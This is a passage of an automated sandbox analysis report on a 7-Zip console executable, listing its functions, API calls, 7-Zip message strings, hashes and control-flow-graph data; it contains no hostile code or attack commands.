                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionThrow$free$wcscmp
                                                                                                                                                                                                                                                                            • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
                                                                                                                                                                                                                                                                            • API String ID: 1252877886-1892825451
                                                                                                                                                                                                                                                                            • Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                                                                                                                                                            • Instruction ID: c69f3eb2e7d6dc4c1f20962e96e85236353e1bb807fdabf5bb28a33bcabd4e71
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE52D1B23046C5A6EB28DF29D0907EEBB62F356784F888016D79D07B12DB79D5B8C700
                                                                                                                                                                                                                                                                            Function 00671D04 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                            • String ID: SeSecurityPrivilege
                                                                                                                                                                                                                                                                            • API String ID: 1313864721-2333288578
                                                                                                                                                                                                                                                                            • Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                                                                                            • Instruction ID: a76e3966ac431368bba6bc6eb709b43fcbc026d3841a958ce025cd7ffd6b3e59
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A117F72304B40C2DA109B56F9543AAB3A7FFC6B81F944112EA8F56A54CF3DC859CF02
                                                                                                                                                                                                                                                                            Function 0066AC74 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0066AC84
                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32 ref: 0066AC95
                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32 ref: 0066ACA9
                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,0066F928), ref: 0066ACE0
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,0066F928), ref: 0066ACEA
                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE ref: 0066ACFA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3398352648-0
                                                                                                                                                                                                                                                                            • Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                                                                                            • Instruction ID: 13a7303c821b77f6a08c7d3458571f1b51115e54779f34b844968ef007976cf2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53018C7261468187DB109FA0E88079A73A2F781B85F544135EB8A92A54CF3CC899CF02
                                                                                                                                                                                                                                                                            Function 00667978 Relevance: 4.6, APIs: 3, Instructions: 70fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0066794C: FindClose.KERNELBASE ref: 0066795E
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE ref: 006679BA
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: free.MSVCRT ref: 006633D7
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: memmove.MSVCRT(00000000,?,?,00000000,006610A8), ref: 006633F2
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE ref: 006679FA
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00667A08
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Find$FileFirstfree$Closememmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2921071498-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                                                                                            • Instruction ID: 83fcd9871da88aa39fb731a8d35379b5a7cfd5efce1f9e8ca64b986e56a71d44
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34215E37208B8086CB21DF65E45039D63A2F78A7B8F544324EAB9477D8DF39CA09C741
                                                                                                                                                                                                                                                                            Function 00674418 Relevance: 221.1, APIs: 132, Strings: 14, Instructions: 2096COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: hh$Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
                                                                                                                                                                                                                                                                            • API String ID: 0-1513455750
                                                                                                                                                                                                                                                                            • Opcode ID: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
                                                                                                                                                                                                                                                                            • Instruction ID: b81c1774ce55cb0ea5612d3d9da0c6b5f7d8c6ae43c0eba2e3d1f7e6799834ae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC038072208E8182CB71EB25E4542AEF762F7C6BC0F548116EB9E43B25DF79C985CB04
                                                                                                                                                                                                                                                                            Function 006A950D Relevance: 116.2, APIs: 48, Strings: 18, Instructions: 748COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1016 6a950d-6a9510 1017 6a9a40-6a9a8e call 662130 1016->1017 1018 6a9516-6a9529 call 66ed74 1016->1018 1028 6a9aa2 1017->1028 1029 6a9a90-6a9aa0 call 663314 1017->1029 1024 6a952f-6a9537 1018->1024 1025 6a9820-6a9828 1018->1025 1030 6a9539-6a9541 1024->1030 1031 6a9557-6a95d5 call 6a3230 call 663208 1024->1031 1026 6a982e-6a983f call 6a78a8 1025->1026 1027 6a99e4-6a99ee 1025->1027 1045 6a984c-6a994d call 6a6990 call 662bc8 call 687880 call 662bc8 call 662cdc call 6a6c04 1026->1045 1046 6a9841-6a9845 1026->1046 1037 6a9a20-6a9a3f _CxxThrowException 1027->1037 1038 6a99f0-6a9a1b call 662300 fputs * 2 call 662300 1027->1038 1035 6a9aa5-6a9ac8 call 66b8f0 call 662130 1028->1035 1029->1035 1030->1031 1034 6a9543-6a9552 call 663518 1030->1034 1056 6a95d7-6a95df 1031->1056 1057 6a95e5 1031->1057 1034->1031 1059 6a9aca-6a9ada call 663314 1035->1059 1060 6a9adc 1035->1060 1037->1017 1038->1037 1097 6a994f 1045->1097 1098 6a9980-6a99df free * 5 call 6a6a20 1045->1098 1046->1045 1056->1057 1061 6a95e1-6a95e3 1056->1061 1062 6a95e8-6a9631 call 663404 call 6a780c 1057->1062 1065 6a9adf-6a9c8b call 66b8f0 call 662130 1059->1065 1060->1065 1061->1062 1078 6a963e-6a964d 1062->1078 1079 6a9633-6a9637 1062->1079 1089 6a9c9a 1065->1089 1090 6a9c8d-6a9c98 call 6a7414 1065->1090 1082 6a964f-6a9657 1078->1082 1083 6a9663 1078->1083 1079->1078 1082->1083 1086 6a9659-6a9661 1082->1086 1087 6a966b-6a972c call 663404 call 6a6990 call 662bc8 1083->1087 1086->1087 1120 6a972f call 6999b8 1087->1120 1095 6a9c9d-6a9ca8 1089->1095 1090->1095 1100 6a9caa-6a9cb3 1095->1100 1101 6a9cb4-6a9d77 call 663404 1095->1101 1103 6a9953-6a9969 1097->1103 1115 6aa5ad-6aa5b5 1098->1115 1100->1101 1113 6a9d79-6a9d7d 1101->1113 1114 6a9d83-6a9e8a call 6a71ec call 663404 call 66ef70 call 663208 call 686be0 1101->1114 1108 6a997b-6a997e 1103->1108 1109 6a996b-6a9976 free * 2 1103->1109 1108->1098 1108->1103 1109->1108 1113->1114 1159 6a9e8c-6a9eb4 call 686e08 1114->1159 1160 6a9ed2-6a9f44 call 685458 1114->1160 1118 6aa5b7-6aa5be 1115->1118 1119 6aa5c5-6aa5c8 1115->1119 1118->1119 1121 6aa5c0 1118->1121 1123 6aa5ca-6aa5e6 _CxxThrowException 1119->1123 1124 6aa5e7-6aa603 free 1119->1124 1122 6a9734-6a973f 1120->1122 1126 6aa5c0 call 6a66a8 1121->1126 1127 6a9750-6a9798 call 6a6c04 1122->1127 1128 6a9741-6a974b call 6ab1c8 1122->1128 1123->1124 1129 6aa626-6aa637 free call 68a13c 1124->1129 1130 6aa605 1124->1130 1126->1119 1140 6a979a 1127->1140 1141 6a97cb-6a981b free * 3 call 6a6a20 free call 6ab310 1127->1141 1128->1127 1139 6aa63c-6aa675 call 6a7080 call 66182c call 6a7f50 1129->1139 1134 6aa609-6aa624 free 1130->1134 1134->1129 1134->1134 1162 6aa6a8-6aa6c9 free 1139->1162 1163 6aa677 1139->1163 1144 6a979e-6a97b4 1140->1144 1141->1115 1148 6a97c6-6a97c9 1144->1148 1149 6a97b6-6a97c1 free * 2 1144->1149 1148->1141 1148->1144 1149->1148 1159->1160 1170 6a9eb6-6a9ed1 _CxxThrowException 1159->1170 1167 6a9f49-6a9f53 1160->1167 1166 6aa67b-6aa691 1163->1166 1171 6aa6a3-6aa6a6 1166->1171 1172 6aa693-6aa69e free * 2 1166->1172 1173 6a9f60-6a9f68 1167->1173 1174 6a9f55-6a9f5b call 6ab1c8 1167->1174 1170->1160 1171->1162 1171->1166 1172->1171 1176 6a9f6a-6a9f74 1173->1176 1177 6a9fbd-6a9fca 1173->1177 1174->1173 1180 6a9fb1-6a9fb9 1176->1180 1181 6a9f76-6a9fac call 662300 fputs call 662300 call 662320 call 662300 1176->1181 1178 6aa02c-6aa033 1177->1178 1179 6a9fcc-6a9fcf call 662300 1177->1179 1184 6aa063-6aa06a 1178->1184 1185 6aa035-6aa03a 1178->1185 1186 6a9fd4-6a9fdc 1179->1186 1180->1177 1181->1180 1187 6aa09e-6aa0a1 1184->1187 1188 6aa06c-6aa071 1184->1188 1185->1184 1190 6aa03c-6aa05e fputs call 6626a0 call 662300 1185->1190 1186->1178 1192 6a9fde-6aa027 fputs call 6626a0 call 662300 fputs call 6626a0 call 662300 1186->1192 1194 6aa114-6aa11b 1187->1194 1195 6aa0a3-6aa0aa 1187->1195 1193 6aa077-6aa099 fputs call 6626a0 call 662300 1188->1193 1188->1194 1190->1184 1192->1178 1193->1187 1200 6aa15c-6aa15f 1194->1200 1201 6aa11d-6aa122 1194->1201 1202 6aa0ac-6aa0ce fputs call 6626a0 call 662300 1195->1202 1203 6aa0d3-6aa0da 1195->1203 1206 6aa16c-6aa16f 1200->1206 1207 6aa161 1200->1207 1201->1207 1211 6aa124-6aa133 call 662300 1201->1211 1202->1203 1203->1194 1205 6aa0dc-6aa0eb call 662300 1203->1205 1205->1194 1230 6aa0ed-6aa10f fputs call 6626a0 call 662300 1205->1230 1215 6aa320-6aa50a free * 2 call 686b58 free call 6a7968 1206->1215 1216 6aa175-6aa17c 1206->1216 1207->1206 1211->1207 1235 6aa135-6aa157 fputs call 6626a0 call 662300 1211->1235 1267 6aa50c 1215->1267 1268 6aa53d-6aa559 free 1215->1268 1224 6aa182-6aa189 1216->1224 1225 6aa2e7-6aa2f6 call 662300 1216->1225 1224->1225 1232 6aa18f-6aa192 1224->1232 1225->1215 1247 6aa2f8-6aa31f fputs call 6626a0 call 662300 1225->1247 1230->1194 1232->1215 1238 6aa198-6aa1a3 1232->1238 1235->1200 1244 6aa1d5-6aa1de 1238->1244 1245 6aa1a5-6aa1cd fputs call 6626a0 call 662300 1238->1245 1251 6aa1f3-6aa223 fputs call 6626a0 call 662300 1244->1251 1252 6aa1e0-6aa1e3 1244->1252 1245->1244 1247->1215 1264 6aa275-6aa2c3 fputs call 6626a0 call 662300 fputs call 6626a0 call 662300 1251->1264 1276 6aa225-6aa270 fputs call 6626a0 call 662300 fputs call 6626a0 call 662300 1251->1276 1252->1251 1258 6aa1e5-6aa1ed 1252->1258 1258->1251 1258->1264 1291 6aa2c8-6aa2cb 1264->1291 1272 6aa510-6aa526 1267->1272 1273 6aa55b 1268->1273 1274 6aa58c-6aa599 free 1268->1274 1277 6aa538-6aa53b 1272->1277 1278 6aa528-6aa533 free * 2 1272->1278 1279 6aa55f-6aa575 1273->1279 1274->1115 1276->1264 1277->1268 1277->1272 1278->1277 1283 6aa587-6aa58a 1279->1283 1284 6aa577-6aa582 free * 2 1279->1284 1283->1274 1283->1279 1284->1283 1291->1215 1293 6aa2cd-6aa2e5 call 662300 call 6a291c 1291->1293 1293->1215
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ExceptionThrowfputs$fputc
                                                                                                                                                                                                                                                                            • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                                                                                                                                                                                                                                                            • API String ID: 1639683984-435538426
                                                                                                                                                                                                                                                                            • Opcode ID: 4c4dbd82c9f8811dec2d4c2d88fd473b5eacc21514dbb3aaf2cf583b9a9ee4bd
                                                                                                                                                                                                                                                                            • Instruction ID: f63ae75e440c5e14687236d60328b00e919c85b8c722e3cc579185b0959b54c6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c4dbd82c9f8811dec2d4c2d88fd473b5eacc21514dbb3aaf2cf583b9a9ee4bd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C726972209AC195CB70EF24E4A03EEB3A2F786B80F44412ADB9D43B19DF38C955CB55
                                                                                                                                                                                                                                                                            Function 006A9B5D Relevance: 84.5, APIs: 33, Strings: 15, Instructions: 507COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1833 6a9b5d-6a9b5f 1834 6a9b79-6a9c1f call 6a057c call 663208 call 6838e8 free 1833->1834 1835 6a9b61-6a9b74 fputs call 662300 1833->1835 1843 6a9c30-6a9c33 1834->1843 1844 6a9c21-6a9c2b call 6ab1c8 1834->1844 1835->1834 1846 6a9c54-6a9c8b call 6ab310 call 662130 1843->1846 1847 6a9c35-6a9c3c 1843->1847 1844->1843 1857 6a9c9a 1846->1857 1858 6a9c8d-6a9c98 call 6a7414 1846->1858 1847->1846 1848 6a9c3e-6a9c4e call 6a0994 1847->1848 1853 6a9c53 1848->1853 1853->1846 1860 6a9c9d-6a9ca8 1857->1860 1858->1860 1862 6a9caa-6a9cb3 1860->1862 1863 6a9cb4-6a9d77 call 663404 1860->1863 1862->1863 1867 6a9d79-6a9d7d 1863->1867 1868 6a9d83-6a9e8a call 6a71ec call 663404 call 66ef70 call 663208 call 686be0 1863->1868 1867->1868 1879 6a9e8c-6a9eb4 call 686e08 1868->1879 1880 6a9ed2-6a9f53 call 685458 1868->1880 1879->1880 1885 6a9eb6-6a9ed1 _CxxThrowException 1879->1885 1886 6a9f60-6a9f68 1880->1886 1887 6a9f55-6a9f5b call 6ab1c8 1880->1887 1885->1880 1889 6a9f6a-6a9f74 1886->1889 1890 6a9fbd-6a9fca 1886->1890 1887->1886 1893 6a9fb1-6a9fb9 1889->1893 1894 6a9f76-6a9fac call 662300 fputs call 662300 call 662320 call 662300 1889->1894 1891 6aa02c-6aa033 1890->1891 1892 6a9fcc-6a9fcf call 662300 1890->1892 1897 6aa063-6aa06a 1891->1897 1898 6aa035-6aa03a 1891->1898 1899 6a9fd4-6a9fdc 1892->1899 1893->1890 1894->1893 1900 6aa09e-6aa0a1 1897->1900 1901 6aa06c-6aa071 1897->1901 1898->1897 1903 6aa03c-6aa05e fputs call 6626a0 call 662300 1898->1903 1899->1891 1905 6a9fde-6aa027 fputs call 6626a0 call 662300 fputs call 6626a0 call 662300 1899->1905 1907 6aa114-6aa11b 1900->1907 1908 6aa0a3-6aa0aa 1900->1908 1906 6aa077-6aa099 fputs call 6626a0 call 662300 1901->1906 1901->1907 1903->1897 1905->1891 1906->1900 1913 6aa15c-6aa15f 1907->1913 1914 6aa11d-6aa122 1907->1914 1915 6aa0ac-6aa0ce fputs call 6626a0 call 662300 1908->1915 1916 6aa0d3-6aa0da 1908->1916 1919 6aa16c-6aa16f 1913->1919 1920 6aa161 1913->1920 1914->1920 1924 6aa124-6aa133 call 662300 1914->1924 1915->1916 1916->1907 1918 6aa0dc-6aa0eb call 662300 1916->1918 1918->1907 1943 6aa0ed-6aa10f fputs call 6626a0 call 662300 1918->1943 1928 6aa320-6aa50a free * 2 call 686b58 free call 6a7968 1919->1928 1929 6aa175-6aa17c 1919->1929 1920->1919 1924->1920 1948 6aa135-6aa157 fputs call 6626a0 call 662300 1924->1948 1980 6aa50c 1928->1980 1981 6aa53d-6aa559 free 1928->1981 1937 6aa182-6aa189 1929->1937 1938 6aa2e7-6aa2f6 call 662300 1929->1938 1937->1938 1945 6aa18f-6aa192 1937->1945 1938->1928 1960 6aa2f8-6aa31f fputs call 6626a0 call 662300 1938->1960 1943->1907 1945->1928 1951 6aa198-6aa1a3 1945->1951 1948->1913 1957 6aa1d5-6aa1de 1951->1957 1958 6aa1a5-6aa1cd fputs call 6626a0 call 662300 1951->1958 1964 6aa1f3-6aa223 fputs call 6626a0 call 662300 1957->1964 1965 6aa1e0-6aa1e3 1957->1965 1958->1957 1960->1928 1977 6aa275-6aa2c3 fputs call 6626a0 call 662300 fputs call 6626a0 call 662300 1964->1977 1989 6aa225-6aa270 fputs call 6626a0 call 662300 fputs call 6626a0 call 662300 1964->1989 1965->1964 1971 6aa1e5-6aa1ed 1965->1971 1971->1964 1971->1977 2015 6aa2c8-6aa2cb 1977->2015 1985 6aa510-6aa526 1980->1985 1986 6aa55b 1981->1986 1987 6aa58c-6aa5b5 free 1981->1987 1990 6aa538-6aa53b 1985->1990 1991 6aa528-6aa533 free * 2 1985->1991 1992 6aa55f-6aa575 1986->1992 1999 6aa5b7-6aa5be 1987->1999 2000 6aa5c5-6aa5c8 1987->2000 1989->1977 1990->1981 1990->1985 1991->1990 1997 6aa587-6aa58a 1992->1997 1998 6aa577-6aa582 free * 2 1992->1998 1997->1987 1997->1992 1998->1997 1999->2000 2001 6aa5c0 call 6a66a8 1999->2001 2003 6aa5ca-6aa5e6 _CxxThrowException 2000->2003 2004 6aa5e7-6aa603 free 2000->2004 2001->2000 2003->2004 2008 6aa626-6aa637 free call 68a13c 2004->2008 2009 6aa605 2004->2009 2016 6aa63c-6aa675 call 6a7080 call 66182c call 6a7f50 2008->2016 2012 6aa609-6aa624 free 2009->2012 2012->2008 2012->2012 2015->1928 2018 6aa2cd-6aa2e5 call 662300 call 6a291c 2015->2018 2031 6aa6a8-6aa6c9 free 2016->2031 2032 6aa677 2016->2032 2018->1928 2033 6aa67b-6aa691 2032->2033 2035 6aa6a3-6aa6a6 2033->2035 2036 6aa693-6aa69e free * 2 2033->2036 2035->2031 2035->2033 2036->2035
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputcfputsfree
                                                                                                                                                                                                                                                                            • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                                                                                                                                                                                                                                                                            • API String ID: 2822829076-727241755
                                                                                                                                                                                                                                                                            • Opcode ID: 871e1854d9edd67bc96b6855a654601f8c0ec871a73ff71051c4b83c8e02dca7
                                                                                                                                                                                                                                                                            • Instruction ID: 728d90f8d7af25221c456289f599bb7b326f586994ddd6ee8fef1b116b3f7074
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 871e1854d9edd67bc96b6855a654601f8c0ec871a73ff71051c4b83c8e02dca7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3224A72309AC191CB74EF65E4A03EEB3A2F786B80F44402ADA9D43B19DF38C955CB45
                                                                                                                                                                                                                                                                            Function 0068A180 Relevance: 47.6, APIs: 23, Strings: 4, Instructions: 342libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
